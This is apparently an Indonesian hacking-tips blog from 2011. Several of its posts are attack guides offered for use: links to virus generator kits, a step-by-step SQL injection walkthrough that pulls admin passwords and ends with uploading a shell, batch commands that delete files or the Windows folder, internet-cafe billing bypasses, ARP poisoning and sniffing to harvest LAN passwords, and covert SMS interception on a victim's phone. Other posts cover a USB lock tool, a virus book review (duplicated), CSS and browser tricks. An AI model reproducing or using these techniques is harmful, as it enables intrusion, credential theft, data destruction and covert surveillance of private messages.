This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Selasa, 28 Juni 2011

VIRUS GENERATOR 1

Posting kali ini kita akan membahas virus, mungkin kita pernah berfikir ingin membuat virus namun kita menyadari kita tidak punya bakat dalam ilmu coding. Kita selalu berfikir membuat virus itu sulit, perlu ilmu VB atau C++. Tapi di sini kita akan belajar membuat virus dengan mesin. Cara gunanya tinggal klik-klik, mungkin mudah tapi jangan meremehkan virus ini sebab virus di indonesia kebanyakan di hasilkan dari alat.

Banyak sekali alat-alat untuk membuat virus disini saya akan menginformasikan, semoga ilmu ini bermanfaat bagi kita.

Ini hanya beberapa generator, banyak lagi tersebar di forum :

1. In Shadow Batch Virus Generator



Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.

Disini Downlod
- Mematikan komputer otomatis, mendownload files otomatis, dll

2. JPS Virus Maker


Kemampuan:
- Mematikan regedit, task manager, MS Config dan beragam aplikasi yang membahayakan kelangsungan hidup virus.
- Menonaktifkan anti virus, wordpad, notepad, command prompt, dll
- Menghiden drive, file, dan tombol-tombol penting seperti Shutdown, restart, logoff, dll
- Mematikan monitor, memainkan mouser, membuka CD drive, dll

DOWNLOAD

Senin, 27 Juni 2011

Mengunci komputer dengan flash disk

FLASHDISK atau media penyimpanan lain melalui port USB dapat digunakan sebagai sebuah alat untuk security atau keamanan

PREDATOR adalah software untuk mengunci PC Anda ketika Anda pergi, bahkan jika sesi windows anda masi terbuka.Dengan menggunakan perangkat USB flashdisk anda dapat mengunci komputer anda dan akan bekerja sebagai berikut :


Kedua2nya dapat dignakan pada
Windows XP SP3
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7

untuk windows 32bit
untuk windows 64bit

* Masukkan USB flashdisk anda ke port USB komputerAnda
* Jalankan program PREDATOR (atau anda dapat menggunakan auto start) yang telah anda install
* Lakukan pekerjaan anda pada komputer
* Ketika anda harus meninggalkan komputer anda untuk melakukan sesuatu kegiatan dan akan melanjutkan kembali, anda tidak perlu mematikan komputer anda dan menutup segala pekerjaan anda, cukup dengan mencabut USB flashdisk anda.
* Bila anda mencabut perangkat USB flashdisk anda, Keyboard dan mouse otomatis tidak dapat digunakan, dan layar monitor akan blank gelap.
* Saat anda kembali untuk melakukan pekerjaan anda pada komputer, masukkan USB Flashdisk anda ke port USB tadi, maka Layar komputer akan tampil kembali, dan mouse serta keyboard akan aktif.

Lebih mudah dan lebih cepat daripada Anda menutup sesi Windows, karena Anda tidak perlu mengetik ulang password anda ketika anda kembali.

Advanced Security Features:

* Lindungi komputer dengan flash drive tunggal. PREDATOR dapat mengirim pesan peringatan melalui Email atau SMS.
* PREDATOR mencatat semua kejadian yang berhubungan dengan keamanan dalam file log: mulai, alarm, stop. Dengan membaca log ini, Anda akan tahu jika penyusup telah mencoba menggunakan komputer Anda saat Anda telah pergi.
* PREDATOR dapat mereplikasi log ini di akun Twitter Anda, memungkinkan Anda untuk jarak jauh memonitor semua aktivitas akses-kontrol pada PC Anda.
* PREDATOR melakukan perubahan kode keamanan yang tercatat pada drive USB anda. Jika seorang penyusup berhasil untuk mengkopy flashdisk Anda, ini tidak akan bekerja karena kode pada flashdisk Anda sendiri akan berubah untuk sementara.
* PREDATOR Menonaktifkan tugas Windows manager ketika Anda mencabut USB drive. Tidak ada yang dapat menghentikannya dengan Ctrl-Alt-Del.
* PREDATOR memungkinkan Anda mendapatkan kembali kontrol dari komputer Anda jika Anda kehilangan flashdisk : ketika Anda mulai perangkat lunak untuk pertama kalinya, Anda menetapkan sandi yang akan membuka sesi Anda jika USB drive anda hilang atau rusak
* PREDATOR dapat membunyikan alarm yang dapat didengar jika seseorang ingin menggunakan komputer dengan memasuki password tidak benar.
* Dan PREDATOR dapat melindungi beberapa PC dengan USB flash drive yang sama, misalnya untuk komputer rumah anda dan komputer kantor.

Dengan PREDATOR, keamanan adalah yang sederhana seperti memasukkan atau mengeluarkan USB stick.

Berminat?
Ada dua versi predator, Versi free dan versi Professional Editions, dimana untuk versi Professional Editions anda harus membeli lisensinya, lihat gambar tabel perbedaan antara versi free dan Professional Editions

Sabtu, 25 Juni 2011

virus research and defense

This is one of the book which i read long back but it still makes one of the best and descriptive text available on Virus.
.
Written by the Peter Szor – the virus expert – “The Art of Computer Virus Research and Defense” presents great material for wanna be experts in Virus research.

Here is the core information about the book,

* Title: The Art of Computer Virus Research and Defense
* Author: Peter Szor
* Publisher: Addison-Wesley Professional
* Hardcover: 744 pages
* Release Date: February 13, 2005
* Rating(Amazon):

.

Here is the table of contents



Part: I Strategies of the Attacker

Chapter Virus 1. Introduction to the Games of Nature
Chapter Virus 2. The Fascination of Malicious Code Analysis
Chapter Virus 3. Malicious Code Environments
Chapter Virus 4. Classification of Infection Strategies
Chapter Virus 5. Classification of In-Memory Strategies
Chapter Virus 6. Basic Self-Protection Strategies
Chapter Virus 7. Advanced Code Evolution Techniques and Computer Virus Generator Kits
Chapter Virus 8. Classification According to Payload
Chapter Virus 9. Strategies of Computer Worms
Chapter Virus 10. Exploits, Vulnerabilities, and Buffer Overflow Attacks

Part: II Strategies of the Defender

Chapter Virus 11. Antivirus Defense Techniques
Chapter Virus 12. Memory Scanning and Disinfection
Chapter Virus 13. Worm-Blocking Techniques and Host-Based Intrusion Prevention
Chapter Virus 14. Network-Level Defense Strategies
Chapter Virus 15. Malicious Code Analysis Techniques

Book is divided into 2 parts, first part is focusing on history, inner workings, classification of virus and second part gives you state of art techniques to defend/detect viruses. First 2 chapters goes with early story of viruses, definitions and basic analysis (more to the point). Chapter 4 & 6 are interesting – explaining how virus infects file systems/memory to put itself into action. It explains some of the core windows concepts while throwing light on PE file modification, Kernel infection etc.



Next it mentions how viruses use Anti-Debugging, Encoding, Encryption, Polymorphism etc techniques to protect themselves from being detected and draws on how virus creator kits have simplified jobs of creating state of art viruses in few clicks. Chapter 9 gives special attention to worms – how they are different from Virus, the way they spread over networks & their execution etc.

Second part is very interesting for those who wanna know how Anti-virus work under the hood. It explains how signature based scanning works, Dynamic Decryption, Tracing of Virus code using Emulation, Heuristic scanning methods. It also throws light on various disinfection techniques, integrity-checking methods, virtualization based virus analysis, scanning of virus code etc. Next it goes on describing virus/worm blocking or detection techniques using host/network intrusion detection systems, firewalls, honeypots, behavioral analysis techniques.

On negative side, this book does not show you how to write virus/worm program for obvious reasons. The book is filled with code snippets (most of them in x86 assembly) justifying the concepts but you will be disappointed if you want to code your own virus. Also this book is little old (published in 2005) as per current trends but it still remains great book when it comes to understanding virus & worms.

DOWNLOAD

Jumat, 24 Juni 2011

This is one of the book which i read long back but it still makes one of the best and descriptive text available on Virus.
.
Written by the Peter Szor – the virus expert – “The Art of Computer Virus Research and Defense” presents great material for wanna be experts in Virus research.

Here is the core information about the book,

* Title: The Art of Computer Virus Research and Defense
* Author: Peter Szor
* Publisher: Addison-Wesley Professional
* Hardcover: 744 pages
* Release Date: February 13, 2005
* Rating(Amazon):

.

Here is the table of contents



Part: I Strategies of the Attacker

Chapter Virus 1. Introduction to the Games of Nature
Chapter Virus 2. The Fascination of Malicious Code Analysis
Chapter Virus 3. Malicious Code Environments
Chapter Virus 4. Classification of Infection Strategies
Chapter Virus 5. Classification of In-Memory Strategies
Chapter Virus 6. Basic Self-Protection Strategies
Chapter Virus 7. Advanced Code Evolution Techniques and Computer Virus Generator Kits
Chapter Virus 8. Classification According to Payload
Chapter Virus 9. Strategies of Computer Worms
Chapter Virus 10. Exploits, Vulnerabilities, and Buffer Overflow Attacks

Part: II Strategies of the Defender

Chapter Virus 11. Antivirus Defense Techniques
Chapter Virus 12. Memory Scanning and Disinfection
Chapter Virus 13. Worm-Blocking Techniques and Host-Based Intrusion Prevention
Chapter Virus 14. Network-Level Defense Strategies
Chapter Virus 15. Malicious Code Analysis Techniques

Book is divided into 2 parts, first part is focusing on history, inner workings, classification of virus and second part gives you state of art techniques to defend/detect viruses. First 2 chapters goes with early story of viruses, definitions and basic analysis (more to the point). Chapter 4 & 6 are interesting – explaining how virus infects file systems/memory to put itself into action. It explains some of the core windows concepts while throwing light on PE file modification, Kernel infection etc.



Next it mentions how viruses use Anti-Debugging, Encoding, Encryption, Polymorphism etc techniques to protect themselves from being detected and draws on how virus creator kits have simplified jobs of creating state of art viruses in few clicks. Chapter 9 gives special attention to worms – how they are different from Virus, the way they spread over networks & their execution etc.

Second part is very interesting for those who wanna know how Anti-virus work under the hood. It explains how signature based scanning works, Dynamic Decryption, Tracing of Virus code using Emulation, Heuristic scanning methods. It also throws light on various disinfection techniques, integrity-checking methods, virtualization based virus analysis, scanning of virus code etc. Next it goes on describing virus/worm blocking or detection techniques using host/network intrusion detection systems, firewalls, honeypots, behavioral analysis techniques.

On negative side, this book does not show you how to write virus/worm program for obvious reasons. The book is filled with code snippets (most of them in x86 assembly) justifying the concepts but you will be disappointed if you want to code your own virus. Also this book is little old (published in 2005) as per current trends but it still remains great book when it comes to understanding virus & worms.

Mengatasi klik kanan

Bagi para peselancar internet yang suka browsing dan mencari tugas. Mungkin kita pernah mendapatkan sebuah web yang di proteksi oleh pemiliknya dengan tujuan supaya tidak bisa di copy paste. Di sini saya akan posting bagaimana kita menerobos keamanan itu, semoga bermanfaat.

Ada beberapa cara untuk mengcopy website mereka antaralain :
# Dengan menyimpan Website mereka ke file berbentuk HTML, caranya, pada brows klik menu file, Save Page As, maka website mereka dapat tersimpan beserta posting mereka di file komputer kita dan kita dapat membukannya secara off line
# Dengan menyorot artikel mereka kemudian menekan tombol Ctrl+C, kemudian di pastekan di program Notepad, maka isi posting mereka sudah tercopy ke komputer kita. apalagi bila dipaste di microsoft word, maka seluruh isi posting mereka berikut gambar-gambarnya dapat kita ambil menjadi sebuah file word
# Dengan cara menggunakan tombol Print Screen, kemudian di pastekan dengan menggunakan program adobe Photoshop atau Pain brush dan simpan dalam file berbentuk tif kemudian dengan menggunakan fasiltas menu Recognize text using OCR, lalu setelah menjadi teks gunakan menu Send text to word.
# Dapat juga dengan cara mendisable atau menon aktifkan program java script, yang mencegah klik kanan dengan menggunakan sebuah addons mozilla firefox, nama program tersebut adalah RightToClick, silahkan Download disini bila keluar pesan tidak dapat klik kanan, centrang kotak stop Klik kanan kemudian klik Ok, maka anda bisa menggunakan klik kanan mouse sepuasnya
# Bisa dilakukan dengan cara “Mendisable JavaScript“, disemua browser ada fungsi ini. Silakan lakukan eksperimen untuk mencari dimana letak informasi mengenai “Disable JavaScript“, berikut ulasan penjelasannya:

Disable JavaScript in Internet Explorer (IE)

1) Buka Internet Explorer (IE)
2) Pada Menu Navigasi Klik: Tools – Internet Optios
3) Pilih Pada: Security Tab – Custom Level
4) Scroll Down sampai ketemu “Active Scripting” dan Klik “Disable”
5) Apply.

Disable JavaScript Mozilla Firefox

1) Buka Mozilla Firefox
2) Pada Navigasi Menu Klik: Tools – Options
3) Kemudian Klik: Content tab, Un-check “enable java script”
4) Apply

Disable JavaScript Google Chrome

1) Pada Google Chrome Shortcut, Klik Kanan -> Pilih Properties.
2) Pada field textbox “Targeted file”, tambahkan “-disable-java” pada bagian belakang.

"C:\Documents and Settings\Administrator.SNAKE\Local Settings\Application Data\
Google\Chrome\Application\chrome.exe" -disable-javascript


ini saya ambil dari binushacker tanks

Selasa, 21 Juni 2011

inject sql (hack web)

Cara ini merupakan cara untuk menyusup ke database admin website. Apabila website tersebut mempunyai celah, maka mudahlah untuk menyusup ke database website itu dan kita bisa mendapatkan acount & passwordnya.

Banyak sekali berbagai cara melakukan SQL injection dan Backdoor salah satunya dengan cara ini, perhatikan cara dibawah ini:


Pertama kita tetapkan target terlebih dahulu
Contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'

Apabila muncul pesan error berarti kita dapat menginject website tersebut, tetapi apabila tidak terdapat pesan error carilah website lainnya yang masih memilki celah.

Kemudian
Mencari dan menghitung jumlah table yang ada dalam databasenya
Gunakan perintah : +order+by+

Contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

Sekarang cek secara satu per satu
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Sehingga muncul error atau hilang pesan error
Misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

Berarti yang kita ambil adalah sampai angka 4 menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

Misalkan pada angka 5 muncul error.

Selanjutnya
Untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 5
Maka:
[site]/news_Event/newsDetail.php?ID=-2+union+select+4--

Ok , yg keluar angka 2
Gunakan perintah version() untuk mengecek versi sql yg dipakai masukan perintah tsb pada angka yg keluar tadi
Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

Lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


Dan selanjutnya
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

Contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+
from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"

And than
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+
from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(co
lumn_name),3,4+from+information_schema.columns+where+table_name
=0x61646d696e--


Kemudian
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Na
me,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang

ket: 0x3a sama dengan : <- titik dua


Terakhir :
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian

Attack notepad

Notepad ternyata dapat membuat file yang dapat merugikan banyak hal, sehingga banyak orang yang memanfaatkan jalan alternatif ini, baik untuk membuat virus, html, dan lain-lain.

Contoh disini saya akan memberikan trik untuk membuat windows menjadi tersenyum-senyum melihat hasil kinerja dari notepad tersebut.


Coba anda buka notepad terlebih dahulu, lalu ketikan script ini:

DEL /F /Q *

Save dengan nama >>> cybergun.cmd

Apabila file "cybergun.cmd" itu anda buka maka semua file dan folder akan terhapus !!!

Sekarang coba anda ketikan script dibawah ini:

erase C:TEST.txt

Save dengan nama >>> cybergun1.cmd

Apabila file "cybergun1.cmd" itu anda buka maka file TEST.txt di drive c:\ akan terhapus !!!

Dan coba lagi anda ketikan script dibawah ini:

erase C:WINDOWS

Save dengan nama >>> cybergun2.cmd

Apabila file "cybergun2.cmd" itu anda buka maka semua file pada folder windows akan terhapus semua!!!!


=============================================================================
Hacking Warnet
Yang pertama saya meminta maaf untuk para operator warnet, tapi ambil baiknya saja, mungkin anda bisa lebih waspada dan lebih memprotect semua pc-pc dalam warnet tersebut.

Sebelum ke warnet ingatlah jangan lupa membawa flashdisk, dan perhatikan trick-trick dibawah ini, baik dari membuat enable beberapa registry windows sampai me-reset time billing explorer. :)


1. Men-enablekan registry, run, command prompt, task manager.
Download file ini disini http://www.ziddu.com/download/5852934/Penangkal.rar.html

Extractlah file tersebut, kemudian klik kanan pada penagkal.inf dan pilih "install"
Apa yang terjadi, silahkan coba sendiri dengan command promptnya :)

2. Sniffing
Gunakan saja file cain & abel, klik disini http://www.oxid.it/cain.html Untuk Mendownload,


3. Dan masih banyak lagi cara lainnya, nanti saya posting lagi cara-cara lainnya (bentrokin IP, cara mengambil bandwitch, etc) :)

Saran saya untuk operator warnet untuk lebih memprotect semua pc-pc dalam warnet tersebut:)

Hacking LAN + Sniffing

Bagaimana hasilnya jika cara ini di gunakan di warned2, or di kantor, or di sekolah, anda bisa panen password and account. Password and account tersebut anda dapatkan dari orang2 yang terhubung ke jaringan internet dan 1 network (LAN)

Cara ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi. Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibutuhkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html



Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini).

Minggu, 19 Juni 2011

HSS ( sofware token ninja saga )

ini bagi para penggemar ninja saga, saya ingin berbagi trik mendapatkan token gratis dan alhamdulilah saya sudah mencoba. nama sofware ini HSS. ini merupakan sebuah sofware untuk merubah IP jadi IP amerika.
kalo kebanyakan penjelasan ga akan seru lebih baik agan coba sendiri ok

download hss disini

ini tutornya disini

CSS MENU GENERATOR dan pengertiann css

neh gan ane share cara membuat menu, dengan menggunakan alat css.
owyah kalo belum tau apa css ini dia.

Cascading Style Sheets (CSS) adalah suatu bahasa stylesheet yang digunakan untuk mengatur tampilan suatu dokumen yang ditulis dalam bahasa markup. Penggunaan yang paling umum dari CSS adalah untuk memformat halaman web yang ditulis dengan HTML dan XHTML. Walaupun demikian, bahasanya sendiri dapat dipergunakan untuk semua jenis dokumen XML termasuk SVG dan XUL. Spesifikasi CSS diatur oleh World Wide Web Consortium (W3C).

CSS digunakan oleh penulis maupun pembaca halaman web untuk menentukan warna, jenis huruf, tata letak, dan berbagai aspek tampilan dokumen. CSS digunakan terutama untuk memisahkan antara isi dokumen (yang ditulis dengan HTML atau bahasa markup lainnya) dengan presentasi dokumen (yang ditulis dengan CSS). Pemisahan ini dapat meningkatkan aksesibilitas isi, memberikan lebih banyak keleluasaan dan kontrol terhadap tampilan, dan mengurangi kompleksitas serta pengulangan pada stuktur isi.

CSS memungkinkan halaman yang sama untuk ditampilkan dengan cara yang berbeda untuk metode presentasi yang berbeda, seperti melalui layar, cetak, suara (sewaktu dibacakan oleh browser basis-suara atau pembaca layar), dan juga alat pembaca braille. Halaman HTML atau XML yang sama juga dapat ditampilkan secara berbeda, baik dari segi gaya tampilan atau skema warna dengan menggunakan CSS.

dan menunya bisa di sedot neh gan

belajar sulap

yap nih kerjaan bingung mau update apa,
malam ini saya akan berbagi e-book sulap buatan orang luar negri semoga aja buat para pesulap ini bermanfaat jangan lupa komen dan follownya ya

download di sini gan

Merubah Tampilan Google Dengan Nama Anda

Bosan dengan tampilan search engine "google" anda? tenang sekarang kita bisa merubah tampilannya dengan nama anda, contohnya biar gak bozen...
1. Buka disini
kenapa 007 ???? gak tahu juga yach... mgkn Om Google kerjasama sam Tom cruise
di organisasi IMF hikz.... hikzzz...
2. Di kolom "create" tuliskan nama yang ingin anda ganti.
3. Copy addresnya dan save sebagai homenya
Tools ---> internet option ------> paste addresnya di home pagenya.
Jadi dech....
Untuk lebih gampangnya tinggal kita tembakkan saja adrresnya. Jadi hasilnya:

ini

Rabu, 15 Juni 2011

update status unik (key api)(statusvia)

Nah siapa yang tahu facebook saya, terkadang saya selalu memakai status dengan via yang berbeda ada yang via "cinta paling dalam" , via kandang ayam dan lain-lain. Disini saya mau berbagi trik bagi pengguna facebook moga aja ini menjadi sesuatu yang bermanfaat amin....
caranya seperti ini :
1. masuk ke akun facebook kamu
2. buka tab baru tapi jangan log out facebook
3. Buka disini,
4.; disana ada banyak pilihan status kamu bisa milih, biasanya saya menngunakan list buatan orang, namun kita juga bisa membuat via yang kita inginkan tapi dengan syarat harus mempunyai key api ( kunci api ), tapi tenang saya punya alamat untuk dapetin key api yaitu disini
nah mungkin sekian ilmu dari saya semoga bermanfaat dan mohon follow sera komennya ya

MENYADAP SMS

saya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!

Tentu saja ada persyaratan yg harus dipenuhi :
Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
HP adalah HP symbian. Baik HP anda maupun HP teman anda.
Merek NOKIA
Memiliki aplikasi simbyan (smsanywherelite.sis)

Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
Masukkan aplikasi symbian itu di HP anda dan teman anda
Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
Siapkan hp/ponsel korban anda
Siapkan HP anda yang akan menerima sms masuk dari korban anda.
Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
